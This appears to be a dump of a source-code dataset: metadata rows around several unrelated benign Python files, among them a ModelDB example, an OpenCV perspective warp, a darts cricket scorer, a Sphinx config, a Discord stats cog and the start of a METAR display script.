] | 5 | 2018-07-17T08:32:53.000Z | 2020-12-11T01:26:06.000Z | modeldb/model_sync.py | jlewi/kubeflow-dev | 5e5093e182a277e8518b1a8abcccb05d20466d35 | [
"Apache-2.0"
] | 16 | 2019-04-14T17:53:46.000Z | 2022-03-02T09:58:52.000Z | modeldb/model_sync.py | jlewi/kubeflow-dev | 5e5093e182a277e8518b1a8abcccb05d20466d35 | [
"Apache-2.0"
] | 10 | 2018-03-06T23:13:21.000Z | 2020-06-26T06:50:10.000Z | """Experiment with using modeldb to track model information using its
API:
https://github.com/mitdbg/modeldb/blob/master/client/python/light_api.md
based on:
https://github.com/mitdbg/modeldb/blob/master/client/python/samples/basic/BasicWorkflow.py
"""
from modeldb.basic.Structs import (
Model, ModelConfig, ModelMetrics, Dataset)
from modeldb.basic.ModelDbSyncerBase import Syncer
if __name__ == "__main__":
# Create a syncer using a convenience API
# syncer_obj = Syncer.create_syncer("gensim test", "test_user", \
# "using modeldb light logging")
# Example: Create a syncer from a config file
syncer_obj = Syncer.create_syncer_from_config("syncer.json")
# Example: Create a syncer explicitly
# syncer_obj = Syncer(
# NewOrExistingProject("gensim test", "test_user",
# "using modeldb light logging"),
# DefaultExperiment(),
# NewExperimentRun("", "sha_A1B2C3D4"))
# Example: Create a syncer from an existing experiment run
# experiment_run_id = int(sys.argv[len(sys.argv) - 1])
# syncer_obj = Syncer.create_syncer_for_experiment_run(experiment_run_id)
print("I'm training some model")
datasets = {
"train" : Dataset("/path/to/train", {"num_cols" : 15, "dist" : "random"}),
"test" : Dataset("/path/to/test", {"num_cols" : 15, "dist" : "gaussian"})
}
# create the Model, ModelConfig, and ModelMetrics instances
model = "model_obj"
model_type = "NN"
mdb_model1 = Model(model_type, model, "/path/to/model1")
model_config1 = ModelConfig(model_type, {"l1" : 10})
model_metrics1 = ModelMetrics({"accuracy" : 0.8})
# sync the datasets to modeldb
syncer_obj.sync_datasets(datasets)
# sync the model with its model config and specify which dataset tag to use for it
syncer_obj.sync_model("train", model_config1, mdb_model1)
# sync the metrics to the model and also specify which dataset tag to use for it
syncer_obj.sync_metrics("test", mdb_model1, model_metrics1)
syncer_obj.sync() | 35.339286 | 90 | 0.722082 | 269 | 1,979 | 5.133829 | 0.375465 | 0.052136 | 0.037654 | 0.045619 | 0.33092 | 0.196959 | 0.196959 | 0.196959 | 0.136133 | 0.06517 | 0 | 0.013221 | 0.159171 | 1,979 | 56 | 91 | 35.339286 | 0.816707 | 0.542193 | 0 | 0 | 0 | 0 | 0.182127 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.105263 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7e5dbfd361bd791bbb77e888a4a723f950db5b6 | 814 | py | Python | 03-image-manipulation/027-getting_perspective_transform.py | megatran/selflearning_openCV_ComputerVision | 9977c72451e5db6d581621f9bba6475020df493b | [
"MIT"
] | 3 | 2016-12-22T01:41:12.000Z | 2018-04-03T14:26:16.000Z | 03-image-manipulation/027-getting_perspective_transform.py | megatran/selflearning_openCV_ComputerVision | 9977c72451e5db6d581621f9bba6475020df493b | [
"MIT"
] | null | null | null | 03-image-manipulation/027-getting_perspective_transform.py | megatran/selflearning_openCV_ComputerVision | 9977c72451e5db6d581621f9bba6475020df493b | [
"MIT"
] | null | null | null | import cv2
import numpy as np
import matplotlib.pyplot as plt
#load input image
source_input = "/Users/nhant/Google Drive/OnlineLearning/selflearning_CV_with_Python/practice_sources/images/scan.jpg"
image = cv2.imread(source_input, 0)
cv2.imshow("Original", image)
cv2.waitKey(0)
#Coordinates of the 4 corners of the original image
points_A = np.float32([[320, 15], [700,215], [85, 610], [530, 780]])
#Coordinates of the 4 corners of the desired output
#use ratio of an A4 paper 1 : 1.41
points_B = np.float32([[0,0], [420, 0], [0,594], [420, 594]])
#Use two sets of four points to compute
#perspective transformation matrix M
M = cv2.getPerspectiveTransform(points_A, points_B)
warped = cv2.warpPerspective(image, M, (420, 594))
cv2.imshow("Warp Perspective", warped)
cv2.waitKey(0)
cv2.destroyAllWindows() | 30.148148 | 118 | 0.749386 | 130 | 814 | 4.615385 | 0.561538 | 0.033333 | 0.036667 | 0.056667 | 0.096667 | 0.096667 | 0.096667 | 0 | 0 | 0 | 0 | 0.093969 | 0.124079 | 814 | 27 | 119 | 30.148148 | 0.747546 | 0.272727 | 0 | 0.142857 | 0 | 0 | 0.212947 | 0.13799 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.214286 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ea76e3a00992a63464a4b9c3737bee379992e0 | 471 | py | Python | ai2_replication/tables.py | georgetown-cset/ai-definitions-for-policymaking | 667e928c8bb30f6e02696ac71081c6bae4096f50 | [
"ADSL"
] | 1 | 2020-06-24T20:45:03.000Z | 2020-06-24T20:45:03.000Z | ai2_replication/tables.py | georgetown-cset/ai-definitions-for-policymaking | 667e928c8bb30f6e02696ac71081c6bae4096f50 | [
"ADSL"
] | null | null | null | ai2_replication/tables.py | georgetown-cset/ai-definitions-for-policymaking | 667e928c8bb30f6e02696ac71081c6bae4096f50 | [
"ADSL"
] | null | null | null | from bq import create_client, read_sql, query
DATASET = 'ai2_replication'
client = create_client()
def make_table(table, **kw):
sql = read_sql(f'../ai2_replication/{table}.sql')
job = query(sql, table, dataset=DATASET, truncate=True, **kw)
return job.result()
make_table('institutions')
make_table('paper_authors_w_countries')
make_table('language')
make_table('ai_papers_any_author')
make_table('paper_author_institution')
make_table('oecd_comparison')
| 24.789474 | 65 | 0.757962 | 66 | 471 | 5.075758 | 0.515152 | 0.18806 | 0.083582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004751 | 0.106157 | 471 | 18 | 66 | 26.166667 | 0.790974 | 0 | 0 | 0 | 0 | 0 | 0.316348 | 0.167728 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.076923 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ece99dd02eb89f09500f97afcdb043d91ff97d | 6,002 | py | Python | index.py | wpcarro/cricket_assist | a1183f586f48cf4f9b2d9ee01c4ed6537477f6c4 | [
"MIT"
] | null | null | null | index.py | wpcarro/cricket_assist | a1183f586f48cf4f9b2d9ee01c4ed6537477f6c4 | [
"MIT"
] | null | null | null | index.py | wpcarro/cricket_assist | a1183f586f48cf4f9b2d9ee01c4ed6537477f6c4 | [
"MIT"
] | null | null | null | import re, sys
from itertools import cycle
DEBUG = False
def init_board(player_name):
# 50 will be a bullseye
b = dict((k, 0) for k in range(20, 14, -1))
b.update({50: 0})
b['player_name'] = player_name
return b
def create_game(player_name_1, player_name_2, is_three_player=False):
score_1 = init_board(player_name_1)
score_2 = init_board(player_name_2)
return (score_1, score_2)
def create_n_games(player_names):
return [init_board(pn) for pn in player_names]
def record_scores(board, *scores):
for s in scores:
try:
board[s] += 1
except KeyError as ke:
if DEBUG:
print('%d is not a score in cricket...' % s)
def is_winning_board(board):
return all(v >= 3 for k, v in board.items() if k != 'player_name')
def clamp(mn, mx, x):
return max(min(x, mx), mn)
def score_to_symbol(score):
symbol_dict = {
0: '.',
1: '/',
2: 'X',
3: '©'
}
return symbol_dict[clamp(0, 3, score)]
def num_to_symbol(num):
return num if num != 50 else 'BE'
def print_board(board):
print(board['player_name'])
for (k, v) in board.items():
if k == 'player_name':
continue
v = clamp(0, 3, v)
print('{num} {s} '.format(
num=num_to_symbol(k),
s=score_to_symbol(v)
))
print('----------\n')
def print_game(board_1, board_2):
if DEBUG:
print('-- DEBUG --')
print('board_1')
print(board_1)
print('board_2')
print(board_2)
print()
print('-- Current Game --')
for (k1, v1), (k2, v2) in zip(board_1.items(), board_2.items()):
if k1 == 'player_name':
continue
v1, v2 = clamp(0, 3, v1), clamp(0, 3, v2)
print(' {s1} {num} {s2} '.format(
s1=score_to_symbol(v1),
num=num_to_symbol(k1),
s2=score_to_symbol(v2))
)
print('------------------')
print(' %3d %3d ' % (compute_sum(board_1), compute_sum(board_2)))
def compute_sum(board):
blacklist_keys = [
'player_name',
'BE'
]
return sum(int(k) * v for k, v in board.items() if k not in blacklist_keys)
def expand_shorthand(multiplier, score):
return ' '.join([score for x in range(int(multiplier))])
def convert_score(score):
alt_score_formats = {
'b': '50',
'be': '50'
}
try:
score = alt_score_formats[score]
except KeyError as ke:
score = score
return score
def process_input(score_string):
results = []
regex = re.compile(r'(\d+)x(\d{1,2}|be)')
for s in re.split(r'\s+', score_string.lower()):
try:
multiplier, score = regex.match(s).groups()
score = convert_score(score)
score = expand_shorthand(multiplier, score)
except AttributeError as ae:
score = convert_score(s)
results.append(score)
return [int(x) for x in ' '.join(results).split(' ')]
def prompt_debug():
result = input('DEBUG (y/N)? ').lower()
DEBUG = re.compile(r'y(?:es)?').match(result) != None
def prompt_num_players():
result = input('Number of players: ')
return int(result)
def prompt_and_record_scores(current_board):
keep_asking = True
while keep_asking:
try:
scores_string = input('Report %s\'s scores ... ' % current_board['player_name'])
scores = process_input(scores_string)
test_board = current_board.copy()
test_scores = scores.copy()
# Attempt to record the scores on a test board
record_scores(test_board, *scores)
keep_asking = False
except ValueError:
print('Invalid input: %s' % scores_string)
pass
record_scores(current_board, *scores)
def run_n_players(player_count):
player_names = []
if not DEBUG:
player_names = [input('Enter a name for player: ') for player in range(player_count)]
else:
player_names = ['player %d' % x for x in range(player_count)]
if DEBUG:
print('player_names: %s' % player_names)
boards = create_n_games(player_names)
player_index_cycle = cycle(range(player_count))
winning_board = None
should_continue = True
while should_continue:
current_player_index = next(player_index_cycle)
current_board = boards[current_player_index]
prompt_and_record_scores(current_board)
is_last_player = current_player_index + 1 == player_count
if is_last_player:
print_boards(boards)
if not winning_board:
winning_board = current_board if is_winning_board(current_board) else None
should_continue = not (winning_board and is_last_player)
print('%s wins!' % winning_board['player_name'])
print('-- Winning Board --')
print_board(winning_board)
return 0
def print_boards(boards):
player_initials = [board.get('player_name')[0].upper() for board in boards]
initials_string = ' '
board_format_string = '{num}'
for i in range(len(boards)):
initials_string += ' ' + player_initials[i]
board_format_string += ' {' + str(i) + '}'
combined_boards = {}
for k in boards[0].keys():
if k == 'player_name':
continue
combined_boards[k] = [score_to_symbol(clamp(0, 3, board[k])) for board in boards]
print(initials_string)
for (num, scores) in combined_boards.items():
print(board_format_string.format(*scores, num=num_to_symbol(num)))
# TODO: make the number of '-' dynamically generated.
print('------------------\n')
def run():
prompt_debug()
n = prompt_num_players()
return run_n_players(n)
if __name__ == '__main__':
try:
sys.exit(run())
except KeyboardInterrupt as ki:
print('\nThanks for playing!')
sys.exit(1)
| 23.81746 | 93 | 0.588804 | 802 | 6,002 | 4.173317 | 0.19202 | 0.047804 | 0.02689 | 0.01703 | 0.07559 | 0.043621 | 0.023902 | 0.023902 | 0.017927 | 0.017927 | 0 | 0.017584 | 0.279907 | 6,002 | 251 | 94 | 23.912351 | 0.756594 | 0.01966 | 0 | 0.089286 | 0 | 0.005952 | 0.089981 | 0 | 0 | 0 | 0 | 0.003984 | 0 | 1 | 0.119048 | false | 0.005952 | 0.011905 | 0.029762 | 0.214286 | 0.160714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ecf4dea285e29e329083dd299a7dfc50138e80 | 815 | py | Python | days/day008/bite_105_Slice_and_dice/test_bite_105.py | alex-vegan/100daysofcode-with-python-course | b6c12316abe18274b7963371b8f0ed2fd549ef07 | [
"MIT"
] | 2 | 2018-10-28T17:12:37.000Z | 2018-10-28T17:12:39.000Z | days/day008/bite_105_Slice_and_dice/test_bite_105.py | alex-vegan/100daysofcode-with-python-course | b6c12316abe18274b7963371b8f0ed2fd549ef07 | [
"MIT"
] | 3 | 2018-10-28T17:11:04.000Z | 2018-10-29T22:36:36.000Z | days/day008/bite_105_Slice_and_dice/test_bite_105.py | alex-vegan/100daysofcode-with-python-course | b6c12316abe18274b7963371b8f0ed2fd549ef07 | [
"MIT"
] | null | null | null | from bite_105 import slice_and_dice
another_text = """
Take the block of text provided and strip() off the whitespace at the ends.
Split the whole block up by newline (\n).
if the first character is lowercase, split it into words and add the last word
of that line to the results list.
Strip the trailing dot (.) and exclamation mark (!) from the word first.
finally return the results list!
"""
def test_slice_and_dice_default_text():
expected = ['objects', 'y', 'too', ':)', 'bites']
assert slice_and_dice() == expected
def test_slice_and_dice_other_text():
# each line needs to be stripped, so the line starting with ' if'
# is a match here, hence expected matches 'word' too
expected = ['word', 'list', 'list']
assert slice_and_dice(another_text) == expected
| 35.434783 | 80 | 0.69816 | 125 | 815 | 4.4 | 0.552 | 0.072727 | 0.109091 | 0.069091 | 0.152727 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004651 | 0.208589 | 815 | 22 | 81 | 37.045455 | 0.848062 | 0.139877 | 0 | 0 | 0 | 0 | 0.545858 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.133333 | false | 0 | 0.066667 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ede2ad7a4434d9692ca62c8d2ad0603952f192 | 1,902 | py | Python | eutils/xmlfacades/base.py | pmartin23/eutils | 9cd8f30a628b6d7a12b8b2a7b99c2a3e7531dd89 | [
"Apache-2.0"
] | null | null | null | eutils/xmlfacades/base.py | pmartin23/eutils | 9cd8f30a628b6d7a12b8b2a7b99c2a3e7531dd89 | [
"Apache-2.0"
] | null | null | null | eutils/xmlfacades/base.py | pmartin23/eutils | 9cd8f30a628b6d7a12b8b2a7b99c2a3e7531dd89 | [
"Apache-2.0"
] | 1 | 2018-10-08T16:34:55.000Z | 2018-10-08T16:34:55.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import lxml.etree
from eutils.exceptions import EutilsError
logger = logging.getLogger(__name__)
class Base(object):
"""Root class for all xmlfacade classes.
This class is instantiated only by subclasses.
xmlfacades must be instantiated with an XML document, passed
either as XML text or as the root of a parsed XML document.
_root_tag must be defined by the subclass. It is used to validate
the node type upon instantiation of the subclass.
"""
_root_tag = None
def __init__(self, xml):
if isinstance(xml, lxml.etree._Element):
self._xml_root = xml
elif isinstance(xml, str) or isinstance(xml, bytes):
self._xml_root = lxml.etree.XML(xml)
else:
raise EutilsError("Cannot create object from type " + type(xml).__name__)
if self._root_tag is None:
raise EutilsError("_root_tag not defined for class {}".format(type(self).__name__))
elif self._root_tag != self._xml_root.tag:
raise EutilsError("XML for {} object must be a {} element (got {})".format(
type(self).__name__, self._root_tag, self._xml_root.tag))
# <LICENSE>
# Copyright 2015 eutils Committers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
# </LICENSE>
| 32.793103 | 95 | 0.702419 | 268 | 1,902 | 4.80597 | 0.473881 | 0.043478 | 0.034161 | 0.02795 | 0.03882 | 0.03882 | 0.03882 | 0 | 0 | 0 | 0 | 0.006036 | 0.216088 | 1,902 | 57 | 96 | 33.368421 | 0.857814 | 0.484753 | 0 | 0 | 0 | 0 | 0.120043 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.210526 | 0 | 0.368421 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ee062bcf2f22e9d0d6db53332fc8d8fd058131 | 4,442 | py | Python | doc/conf.py | isuruf/pycl-fft | 7380fd573dcd6ff43fa8c1cdd99a861558fc8166 | [
"MIT"
] | 1 | 2022-03-24T16:20:27.000Z | 2022-03-24T16:20:27.000Z | doc/conf.py | isuruf/pycl-fft | 7380fd573dcd6ff43fa8c1cdd99a861558fc8166 | [
"MIT"
] | 1 | 2022-03-24T20:40:18.000Z | 2022-03-24T20:40:18.000Z | doc/conf.py | isuruf/pycl-fft | 7380fd573dcd6ff43fa8c1cdd99a861558fc8166 | [
"MIT"
] | 1 | 2022-03-24T20:07:03.000Z | 2022-03-24T20:07:03.000Z | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath("."))
# -- Project information -----------------------------------------------------
project = "pycl_fft"
copyright = "2021, Zachary J Weiner"
author = "Zachary J Weiner"
import pkg_resources
version = pkg_resources.get_distribution("pycl_fft").version
release = version
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named "sphinx.ext.*") or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.intersphinx",
"sphinx.ext.linkcode",
"sphinx.ext.ifconfig",
"sphinx.ext.doctest",
"sphinx_copybutton"
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "furo"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
intersphinx_mapping = {
"python": ("https://docs.python.org/3", None),
"numpy": ("https://docs.scipy.org/doc/numpy/", None),
"scipy": ("https://docs.scipy.org/doc/scipy/reference/", None),
"pyopencl": ("https://documen.tician.de/pyopencl", None),
"pytest": ("https://docs.pytest.org/en/latest/", None),
}
latex_elements = {
"maxlistdepth": "99",
}
# autodoc_mock_imports = ["sympy"]
import os
on_rtd = os.environ.get("READTHEDOCS") == "True"
# setup copy button thing
def setup(app):
app.add_config_value("on_rtd", on_rtd, "env")
doctest_global_setup = """
import pyopencl as cl
import pyopencl.array as cla
"""
copybutton_prompt_text = r">>> |\.\.\. |\$ |In \[\d*\]: | {2,5}\.\.\.: | {5,8}: "
copybutton_prompt_is_regexp = True
import sys
import inspect
linkcode_revision = "main"
linkcode_url = "https://github.com/zachjweiner/pycl-fft/blob/" \
+ linkcode_revision + "/{filepath}#L{linestart}-L{linestop}"
def linkcode_resolve(domain, info):
if domain != "py" or not info["module"]:
return None
modname = info["module"]
topmodulename = modname.split(".")[0]
fullname = info["fullname"]
submod = sys.modules.get(modname)
if submod is None:
return None
obj = submod
for part in fullname.split("."):
try:
obj = getattr(obj, part)
except Exception:
return None
try:
modpath = pkg_resources.require(topmodulename)[0].location
filepath = os.path.relpath(inspect.getsourcefile(obj), modpath)
if filepath is None:
return
except Exception:
return None
try:
source, lineno = inspect.getsourcelines(obj)
except OSError:
return None
else:
linestart, linestop = lineno, lineno + len(source) - 1
return linkcode_url.format(
filepath=filepath, linestart=linestart, linestop=linestop)
import pycl_fft
pycl_fft.clfft.Transform = pycl_fft.clfft.Transform.__wrapped__
pycl_fft.vkfft.Transform = pycl_fft.vkfft.Transform.__wrapped__
rst_prolog = """
.. |vkfft| replace:: :mod:`VkFFT`
.. _vkfft: https://github.com/DTolm/VkFFT
.. |clfft| replace:: :mod:`clFFT`
.. _clfft: https://github.com/clMathLibraries/clFFT
.. |scipy| replace:: :mod:`scipy`
.. _scipy: https://docs.scipy.org/doc/scipy/reference/
"""
| 29.223684 | 81 | 0.653534 | 556 | 4,442 | 5.116906 | 0.420863 | 0.019684 | 0.014763 | 0.017926 | 0.088576 | 0.027417 | 0.027417 | 0.027417 | 0 | 0 | 0 | 0.004089 | 0.174246 | 4,442 | 151 | 82 | 29.417219 | 0.771538 | 0.356596 | 0 | 0.142857 | 0 | 0 | 0.323779 | 0.020524 | 0 | 0 | 0 | 0.006623 | 0 | 1 | 0.02381 | false | 0 | 0.083333 | 0 | 0.190476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ef0b6330bf83a65c9139ff19ea3b7d9451cdd7 | 1,062 | py | Python | cogs/dbl.py | AdibHoque/dat_orange_bot | e3c4d26587903eeea986225d330d8c46b981b1e7 | [
"Apache-2.0"
] | 1 | 2020-08-06T09:43:50.000Z | 2020-08-06T09:43:50.000Z | cogs/dbl.py | AdibHoque/dat_orange_bot | e3c4d26587903eeea986225d330d8c46b981b1e7 | [
"Apache-2.0"
] | null | null | null | cogs/dbl.py | AdibHoque/dat_orange_bot | e3c4d26587903eeea986225d330d8c46b981b1e7 | [
"Apache-2.0"
] | 1 | 2020-06-13T15:42:24.000Z | 2020-06-13T15:42:24.000Z | import discord
import json
import aiohttp
import asyncio
import os
from discord.ext import commands
uri = 'https://discordbots.org/api'
class dbl:
def __init__(self, bot):
self.bot = bot
self.session = aiohttp.ClientSession()
def __unload(self):
self.bot.loop.create_task(self.session.close())
async def send(self):
dump = json.dumps({
'server_count': len(self.bot.guilds)
})
head = {
'authorization': os.environ.get('DBLAPI'),
'content-type' : 'application/json'
}
url = '{0}/bots/439919013766758420/stats'.format(uri)
async with self.session.post(url, data=dump, headers=head) as resp:
print('returned {0.status} for {1} on dbl'.format(resp, dump))
async def on_guild_join(self, server):
await self.send()
async def on_guild_remove(self, server):
await self.send()
async def on_ready(self):
await self.send()
def setup(bot):
bot.add_cog(dbl(bot))
| 23.086957 | 75 | 0.596045 | 133 | 1,062 | 4.654135 | 0.518797 | 0.045234 | 0.048465 | 0.048465 | 0.106624 | 0.106624 | 0.106624 | 0.106624 | 0 | 0 | 0 | 0.027523 | 0.281544 | 1,062 | 45 | 76 | 23.6 | 0.783748 | 0 | 0 | 0.09375 | 0 | 0 | 0.144068 | 0.031073 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09375 | false | 0 | 0.1875 | 0 | 0.3125 | 0.03125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ef3163c0a10b7deccdaa772bc3b92dde71d51f | 91,866 | py | Python | metar-display-v4.py | IceMan21/livesectional | bfd76adea22d38eea71b772d3f9b6e3851d6ee24 | [
"MIT-feh"
] | 5 | 2020-10-20T18:26:39.000Z | 2021-06-08T17:39:30.000Z | metar-display-v4.py | IceMan21/livesectional | bfd76adea22d38eea71b772d3f9b6e3851d6ee24 | [
"MIT-feh"
] | 10 | 2020-09-29T05:05:03.000Z | 2021-09-24T20:55:32.000Z | metar-display-v4.py | IceMan21/livesectional | bfd76adea22d38eea71b772d3f9b6e3851d6ee24 | [
"MIT-feh"
] | 4 | 2020-09-29T02:23:38.000Z | 2022-03-23T04:21:53.000Z | #!/usr/bin/python3
#metar-display-v4.py - by Mark Harris.
# Updated to work with Python 3.7
# Adds TAF display when rotary switch is positioned accordingly. Default data user selectable if no rotary switch is used.
# Adds MOS data display when rotary switch is positioned accordingly.
# Adds timer routine to turn off map at night (or whenever) then back on again automatically. Pushbutton to turn on temporarily
# Fixed bug where 'LGND' wasn't filtered from URL.
# Changed welcome message to stop scrolling.
# Add auto restart if config.py is saved so new settings will automatically be read by scripts
# Add IP display with welcome message if desired.
# Added internet availability check and retry if necessary. This should help when power is disrupted and board reboots before router does.
# Added Logging capability; the log is stored in /NeoSectional/logfile.log
# Added ability to display wind direction as an arrow or numbers.
# Fixed bug when a blank screen is desired and abovekts is used as well. Thanks Lance.
# Added Top 10 list for Heat Map
# Added Gusting Winds, CALM and VRB based on Lance Blank's work. Thank you Lance.
# Added ability to detect a Rotary Switch is NOT installed and react accordingly.
# Added ability to specify an exclusive subset of airports to display.
# Added ability to display text rotated 180 degrees, and/or reverse order of display of multiple OLED's if wired backwards
# Added fix to Sleep Timer. Thank You to Matthew G for your code to make this work.
#Displays airport ID, wind speed in kts and wind direction on an LCD or OLED display.
#Wind direction uses an arrow to display general wind direction from the 8 cardinal points on a compass.
#The settings below can be changed to display the top X number of airports or just those whose winds are above a specified speed.
#The OLED display can be inverted, and even the highest wind can be displayed in bold font.
#A welcome message can be displayed each time the FAA weather is updated. (Multi-Oleds only)
#Also, the local and zulu time can be displayed after each group of high winds have been displayed. (Multi-Oleds only)
#To be used along with metar-v4.py if an LCD or OLED display is used.
#startup.py is run at boot-up by /etc/rc.local to create 2 threads. One running this script and the other thread running metar-v4.py
#startup.py taken from; https://raspberrypi.stackexchange.com/questions/39108/how-do-i-start-two-different-python-scripts-with-rc-local
#Currently written for 16x2 LCD panel wired in 4 bit arrangement or a Single OLED Display SSD1306.SSD1306_128_64 or 128x32 with changes to text output.
#With a TCA9548A I2C Multiplexer, up to 8 OLED displays can be used and some of the features need multiple OLED's. https://www.adafruit.com/product/2717
#For info on using the TCA9548A see;
#https://buildmedia.readthedocs.org/media/pdf/adafruit-circuitpython-tca9548a/latest/adafruit-circuitpython-tca9548a.pdf
#An IC238 Light Sensor can be used to control the brightness of the OLED displays, or a potentiometer for an LCD Display.
#For more info on the sensor visit; http://www.uugear.com/portfolio/using-light-sensor-module-with-raspberry-pi/
#Important note: to ensure the displayed time is correct, follow these instructions
# sudo raspi-config
# Select Internationalisation Options
# Select I2 Change Timezone
# Select your Geographical Area
# Select your nearest City
# Select Finish
# Select Yes to reboot now
#RPI GPIO Pinouts reference
###########################
# 3V3 (1) (2) 5V #
# GPIO2 (3) (4) 5V #
# GPIO3 (5) (6) GND #
# GPIO4 (7) (8) GPIO14 #
# GND (9) (10) GPIO15 #
# GPIO17 (11) (12) GPIO18 #
# GPIO27 (13) (14) GND #
# GPIO22 (15) (16) GPIO23 #
# 3V3 (17) (18) GPIO24 #
# GPIO10 (19) (20) GND #
# GPIO9 (21) (22) GPIO25 #
# GPIO11 (23) (24) GPIO8 #
# GND (25) (26) GPIO7 #
# GPIO0 (27) (28) GPIO1 #
# GPIO5 (29) (30) GND #
# GPIO6 (31) (32) GPIO12 #
# GPIO13 (33) (34) GND #
# GPIO19 (35) (36) GPIO16 #
# GPIO26 (37) (38) GPIO20 #
# GND (39) (40) GPIO21 #
###########################
#Import needed libraries
#Misc libraries
import urllib.request, urllib.error, urllib.parse
import xml.etree.ElementTree as ET
import time
import sys
import os
from os.path import getmtime
from datetime import datetime
from datetime import timedelta
from datetime import time as time_ #part of timer fix
import operator
import RPi.GPIO as GPIO
import socket
import collections
import re
import random
import logging
import logzero
from logzero import logger
import config #User settings stored in file config.py, used by other scripts
import admin
#LCD Libraries - Only needed if an LCD Display is to be used. Comment out if you would like.
#Visit; http://www.circuitbasics.com/raspberry-pi-lcd-set-up-and-programming-in-python/ and follow info for 4-bit mode.
#To install RPLCD library;
# sudo pip3 install RPLCD
import RPLCD as RPLCD
from RPLCD.gpio import CharLCD
#OLED libraries - Only needed if OLED Display(s) are to be used. Comment out if you would like.
import smbus2 #Install smbus2; sudo pip3 install smbus2
# git clone https://github.com/adafruit/Adafruit_Python_GPIO.git
# cd Adafruit_Python_GPIO
# sudo python3 setup.py install
from Adafruit_GPIO import I2C
import Adafruit_SSD1306 #sudo pip3 install Adafruit-SSD1306
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
# Setup rotating logfile with 3 rotations, each with a maximum filesize of 1MB:
version = admin.version #Software version
loglevel = config.loglevel
